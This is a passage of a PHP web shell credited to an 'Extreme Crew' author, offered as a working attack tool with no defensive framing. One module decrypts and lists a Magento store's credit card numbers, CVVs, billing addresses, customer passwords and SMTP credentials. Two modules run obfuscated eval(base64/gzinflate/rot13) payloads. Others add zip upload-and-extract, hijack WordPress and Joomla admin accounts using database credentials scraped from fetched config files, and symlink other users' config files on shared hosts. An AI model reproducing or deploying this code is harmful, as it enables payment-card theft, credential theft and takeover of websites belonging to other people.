  740.         <td>pass</td>      
  741.         </tr>";  
  742.             $no = 1;  
  743.             $batas = 0;  
  744.             while($rows = mysql_fetch_array($query_smtp)) {  
  745.                 $smtphost = $rows[0];  
  746.                 $smtpport = $rows[1];  
  747.                 $smtpuser = $rows[2];  
  748.                 $smtppass = $rows[3];  
  749.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
  750.                 $no++;  
  751.             }  
  752.         echo "</table><br>";  
  753.     }  
  754.     //=========================================================================================================  
  755.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
  756.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  757.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
  758.           echo'<br><br>  
  759.                 ====================================================================<br>  
  760.                                 [ Credit Card ] <br>  
  761.                 ====================================================================<br>';  
  762.             echo "  
  763.             <table border='1' align='left' >  
  764.             <tr>  
  765.             <td>no</td>  
  766.             <td>Date</td>  
  767.             <td>Credit Owner</td>  
  768.             <td>method</td>  
  769.             <td>Credit Number</td>  
  770.             <td>Credit Exp</td>  
  771.             <td>CVV</td>  
  772.             <td>Address</td>  
  773.             </tr>";  
  774.                 $no = 1;  
  775.                 $batas = 0;  
  776.                 while($vx = mysql_fetch_array($query)){  
  777.                 $date = $vx['updated_at'];  
  778.                 $cc_owner = $vx['cc_owner'];  
  779.                 $method = $vx['method'];  
  780.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
  781.                 $exp = $vx['exp'];          
  782.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
  783.                 $Billing_Address = $vx['Billing Address'];  
  784.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
  785.                 $batas = $no++;  
  786.                 }  
  787.                  
  788.                 while($vx2 = mysql_fetch_array($query2)){  
  789.                     $batas +=1;  
  790.                 $cc_owner = $vx2['cc_owner'];  
  791.                 $method = $vx2['method'];  
  792.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
  793.                 $exp = $vx2['exp'];          
  794.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
  795.                 $Billing_Address = $vx2['Billing Address'];  
  796.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
  797.                  $batas++;  
  798.                 }      
  799.                  
  800.             echo "</table><br>";      
  801.     }  
  802.     //=========================================================================================================  
  803.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
  804.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
  805.      
  806.      
  807.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
  808.         if (!$query){  
  809.               echo "<center><b>Gagal</b></center>";  
  810.         }else{  
  811.               echo'<br><br>  
  812.                     ====================================================================<br>  
  813.                                     [ Customer ] <br>  
  814.                     ====================================================================<br>';  
  815.         }  
  816.         echo "  
  817.         <table border='1' align='center' >  
  818.         <tr>  
  819.         <td>no</td>  
  820.         <td>user</td>  
  821.         <td>pass</td>      
  822.         </tr>";  
  823.             $no = 1;  
  824.             $batas = 0;  
  825.             while($vx = mysql_fetch_array($query)) {  
  826.                 $user = $vx['email'];  
  827.                 $pass = $vx['value'];  
  828.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  829.                 $batas = $no++;  
  830.             }  
  831.              
  832.             if(mysql_num_rows($query2) != 0 && ($query2)){  
  833.                 while($vx2 = mysql_fetch_array($query2)){  
  834.                     $user = $vx2['customer_email'];  
  835.                     $pass = $crypto->decrypt($vx2['password_hash']);  
  836.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
  837.                         $batas +=1;  
  838.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
  839.                         $batas++;  
  840.                     }  
  841.                 }                  
  842.             }  
  843.          
  844.         echo "</table><br>";  
  845.     }  
  846.     //=========================================================================================================  
  847.   }  
  848. }  
  849. function save($format,$data){  
  850.     $fp = fopen($format, 'a');  
  851.     fwrite($fp, $data);  
  852.     fclose($fp);  
  853. }  
  854. function cekbase64($string){  
  855.         $decoded = base64_decode($string, true);  
  856.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
  857.         if(!base64_decode($string, true)) return false;  
  858.         if(base64_encode($decoded) != $string) return false;  
  859.         return true;//nilai return 1 jika true  
  860.     }  
  861. //----untuk decode password ---/  
  862. class Varien_Crypt_Mcrypt{  
  863.     /**  
  864.      * Constuctor  
  865.      *  
  866.      * @param array $data  
  867.      */  
  868.     public function __construct()  
  869.     {  
  870.     }  
  871.  
  872.     /**  
  873.      * Initialize mcrypt module  
  874.      *  
  875.      * @param string $key cipher private key  
  876.      * @return Varien_Crypt_Mcrypt  
  877.      */  
  878.     public function init($key)  
  879.     {  
  880.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
  881.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
  882.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
  883.  
  884.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
  885.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
  886.             return null;  
  887.         }  
  888.  
  889.         mcrypt_generic_init($this->handler, $key, $iv);  
  890.  
  891.         return $this;  
  892.     }  
  893.  
  894.     /**  
  895.      * Encrypt data  
  896.      *  
  897.      * @param string $data source string  
  898.      * @return string  
  899.      */  
  900.     public function encrypt($data)  
  901.     {  
  902.         if (!$this->handler) {  
  903.             //throw new Varien_Exception('Crypt module is not initialized.');  
  904.             return null;  
  905.         }  
  906.         if (strlen($data) == 0) {  
  907.             return $data;  
  908.         }  
  909.         return base64_encode(mcrypt_generic($this->handler, $data));  
  910.     }  
  911.  
  912.     /**  
  913.      * Decrypt data  
  914.      *  
  915.      * @param string $data encrypted string  
  916.      * @return string  
  917.      */  
  918.     public function decrypt($data)  
  919.     {  
  920.         if (!$this->handler) {  
  921.             //throw new Varien_Exception('Crypt module is not initialized.');  
  922.             return null;  
  923.         }  
  924.         if (strlen($data) == 0) {  
  925.             return $data;  
  926.         }  
  927.         return mdecrypt_generic($this->handler, base64_decode($data));  
  928.     }  
  929.          
  930.    
  931.     /**  
  932.      * Desctruct cipher module  
  933.      *  
  934.      */  
  935.     public function __destruct()  
  936.     {  
  937.         if ($this->handler) {  
  938.             $this->_reset();  
  939.         }  
  940.     }  
  941.  
  942.     protected function _reset()  
  943.     {  
  944.         mcrypt_generic_deinit($this->handler);  
  945.         mcrypt_module_close($this->handler);  
  946.     }  
  947. }  
  948. }
  949. elseif($_GET['do'] == 'zip') {
  950.     echo "<center><h1>Zip Menu</h1>";
  951. function rmdir_recursive($dir) {
  952.     foreach(scandir($dir) as $file) {
  953.        if ('.' === $file || '..' === $file) continue;
  954.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  955.        else unlink("$dir/$file");
  956.    }
  957.    rmdir($dir);
  958. }
  959. if($_FILES["zip_file"]["name"]) {
  960.     $filename = $_FILES["zip_file"]["name"];
  961.     $source = $_FILES["zip_file"]["tmp_name"];
  962.     $type = $_FILES["zip_file"]["type"];
  963.     $name = explode(".", $filename);
  964.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  965.     foreach($accepted_types as $mime_type) {
  966.         if($mime_type == $type) {
  967.             $okay = true;
  968.             break;
  969.         }
  970.     }
  971.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  972.     if(!$continue) {
  973.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  974.     }
  975.   $path = dirname(__FILE__).'/';
  976.   $filenoext = basename ($filename, '.zip');
  977.   $filenoext = basename ($filenoext, '.ZIP');
  978.   $targetdir = $path . $filenoext;
  979.   $targetzip = $path . $filename;
  980.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  981.   mkdir($targetdir, 0777);
  982.     if(move_uploaded_file($source, $targetzip)) {
  983.         $zip = new ZipArchive();
  984.         $x = $zip->open($targetzip);
  985.         if ($x === true) {
  986.             $zip->extractTo($targetdir);
  987.             $zip->close();
  988.  
  989.             unlink($targetzip);
  990.         }
  991.         $message = "<b>Sukses Gan :)</b>";
  992.     } else {   
  993.         $message = "<b>Error Gan :(</b>";
  994.     }
  995. }  
  996. echo '<table style="width:100%" border="1">
  997.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  998. <label>Zip File : <input type="file" name="zip_file" /></label>
  999. <input type="submit" name="submit" value="Upload And Unzip" />
  1000. </form>';
  1001. if($message) echo "<p>$message</p>";
  1002. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1003.     if($_POST['backup']){
  1004.     $save=$_POST['save'];
  1005.     function Zip($source, $destination)
  1006. {
  1007.     if (extension_loaded('zip') === true)
  1008.     {
  1009.         if (file_exists($source) === true)
  1010.         {
  1011.             $zip = new ZipArchive();
  1012.  
  1013.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1014.             {
  1015.                 $source = realpath($source);
  1016.  
  1017.                 if (is_dir($source) === true)
  1018.                 {
  1019.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1020.  
  1021.                     foreach ($files as $file)
  1022.                     {
  1023.                         $file = realpath($file);
  1024.  
  1025.                         if (is_dir($file) === true)
  1026.                         {
  1027.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1028.                         }
  1029.  
  1030.                         else if (is_file($file) === true)
  1031.                         {
  1032.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1033.                         }
  1034.                     }
  1035.                 }
  1036.  
  1037.                 else if (is_file($source) === true)
  1038.                 {
  1039.                     $zip->addFromString(basename($source), file_get_contents($source));
  1040.                 }
  1041.             }
  1042.  
  1043.             return $zip->close();
  1044.         }
  1045.     }
  1046.  
  1047.     return false;
  1048. }
  1049.     Zip($_POST['dir'],$save);
  1050.     echo "Done , Save To <b>$save</b>";
  1051.     }
  1052.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1053.     if($_POST['extrak']){
  1054.     $save=$_POST['save'];
  1055.     $zip = new ZipArchive;
  1056.     $res = $zip->open($_POST['dir']);
  1057.     if ($res === TRUE) {
  1058.         $zip->extractTo($save);
  1059.         $zip->close();
  1060.     echo 'Succes , Location : <b>'.$save.'</b>';
  1061.     } else {
  1062.     echo 'Gagal Mas :( Ntahlah !';
  1063.     }
  1064.     }
  1065. echo '</tr></table>';  
  1066.     }
  1067.     elseif($_GET['do'] == 'shellchk') {
  1068.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1069.     } elseif($_GET['do'] == 'loghunter')
  1070.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
  1071. elseif($_GET['do'] == 'metu') {
  1072.    
  1073.  
  1074. echo '<form action="?dir=$dir&do=metu" method="post">';
  1075.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1076.     echo 'Byee !';
  1077.    
  1078. }
  1079. elseif($_GET['do'] == 'about') {
  1080.    
  1081.     echo '<center>By Mr.ToKeiChun69 - Extreme Crew';
  1082.    
  1083. }
  1084. elseif($_GET['do'] == 'auto_cu_wp') {
  1085. if($_POST['gass']) {
  1086.     echo "<center><h1>WordPress Auto Change User 2</h1>
  1087.         <form method='post'>
  1088.         Link Config: <br>
  1089.         <textarea name='link' style='width: 450px; height:250px;'>";
  1090.     UrlLoop($_POST['linkconf'],'wordpress');   
  1091.     echo"</textarea><br>
  1092.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1093.         </form></center>";
  1094. }   else {
  1095.         echo "<center><h1>WordPress Auto Change User 2</h1>
  1096.         <form method='post'>
  1097.         Link Config: <br>
  1098.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/viewsymcnf/'><br>
  1099.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1100.         </form></center>";
  1101.     }
  1102. if($_POST['auto_cu_wp']) {
  1103.    
  1104.         function anucurl($sites) {
  1105.             $ch = curl_init($sites);
  1106.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1107.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1108.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1109.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1110.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1111.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1112.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1113.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1114.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1115.             $data = curl_exec($ch);
  1116.                   curl_close($ch);
  1117.             return $data;
  1118.         }
  1119.         $link = explode("\r\n", $_POST['link']);
  1120.         $user = "faisa69";
  1121.         $pass = "faisa69";
  1122.         $passx = md5($pass);
  1123.         foreach($link as $dir_config) {
  1124.             $config = anucurl($dir_config);
  1125.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1126.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1127.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1128.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1129.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1130.             $prefix = $dbprefix."users";
  1131.             $option = $dbprefix."options";
  1132.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1133.             $db = mysql_select_db($dbname);
  1134.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1135.             $result = mysql_fetch_array($q);
  1136.             $id = $result[ID];
  1137.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1138.             $result2 = mysql_fetch_array($q2);
  1139.             $target = $result2[option_value];
  1140.             if($target == '') {                
  1141.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1142.             } else {
  1143.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1144.             }
  1145.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1146.             if(!$conn OR !$db OR !$update) {
  1147.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1148.                 mysql_close($conn);
  1149.             } else {
  1150.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1151.                     echo "[+] username: <font color=lime>$user</font><br>";
  1152.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1153.                    
  1154.                 mysql_close($conn);
  1155.             }
  1156.         }
  1157.     }  
  1158.  
  1159. }
  1160. elseif($_GET['do'] == 'auto_cu_joomla') {
  1161. if($_POST['gass']) {
  1162.     echo "<center><h1>Joomla Auto Change User 2</h1>
  1163.         <form method='post'>
  1164.         Link Config: <br>
  1165.         <textarea name='link' style='width: 450px; height:250px;'>";
  1166.     UrlLoop($_POST['linkconf'],'joomla');  
  1167.     echo"</textarea><br>
  1168.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1169.         </form></center>";
  1170. }   else {
  1171.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1172.         <form method='post'>
  1173.         Link Config: <br>
  1174.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/viewsymcnf/'><br>
  1175.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1176.         </form></center>";
  1177.     }
  1178. if($_POST['auto_cu_joomla']) {
  1179.    
  1180.         function anucurl($sites) {
  1181.             $ch = curl_init($sites);
  1182.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1183.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1184.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1185.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1186.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1187.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1188.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1189.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1190.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1191.             $data = curl_exec($ch);
  1192.                   curl_close($ch);
  1193.             return $data;
  1194.         }
  1195.         $link = explode("\r\n", $_POST['link']);
  1196.         $user = "faisa69";
  1197.         $pass = "faisa69";
  1198.         $passx = md5($pass);
  1199.         foreach($link as $dir_config) {
  1200.             $config = anucurl($dir_config);
  1201.                     $dbhost = ambilkata($config,"host = '","'");
  1202.                     $dbuser = ambilkata($config,"user = '","'");
  1203.                     $dbpass = ambilkata($config,"password = '","'");
  1204.                     $dbname = ambilkata($config,"db = '","'");
  1205.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1206.                     $prefix = $dbprefix."users";
  1207.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1208.                     $db = mysql_select_db($dbname);
  1209.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1210.                     $result = mysql_fetch_array($q);
  1211.                     $id = $result['id'];
  1212.                     $site = ambilkata($config,"sitename = '","'");
  1213.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1214.                     echo "Config => ".$dir_config."<br>";
  1215.                     echo "CMS => Joomla<br>";
  1216.                     if($site == '') {
  1217.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1218.                     } else {
  1219.                         echo "Sitename => $site<br>";
  1220.                     }
  1221.                     if(!$update OR !$conn OR !$db) {
  1222.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1223.                     } else {
  1224.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1225.                     }
  1226.                     mysql_close($conn);
  1227.                     }
  1228.     }  
  1229. }
  1230. elseif($_GET['do'] == 'symconfig') {
  1231. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1232. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1233. exit;
  1234. }
  1235. else
  1236. {
  1237. if($_POST["m"] && !$_POST["passwd"]==""){
  1238. @mkdir("viewsymcnf", 0777);
  1239. @chdir("viewsymcnf");
  1240. @symlink("/","root");
  1241. $htaccess="Options Indexes FollowSymLinks
  1242. DirectoryIndex janchonx.htm
  1243. AddType text/plain .php
  1244. AddHandler text/plain .php
  1245. Satisfy Any";
  1246. @file_put_contents(".htaccess",$htaccess);
  1247. $etc_passwd=$_POST["passwd"];
  1248. $etc_passwd=explode("\n",$etc_passwd);
  1249. foreach($etc_passwd as $passwd){
  1250. $pawd=explode(":",$passwd);
  1251. $user =$pawd[0];
  1252.  
  1253. @symlink('/','viewsymcnf/root');
  1254. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1255. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1256. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1257. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1258. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1259. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1260. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1261. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1262. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1263. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1264. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1265. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1266. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1267. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1268. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1282. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1283. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1286. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1288. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1291. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1294. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
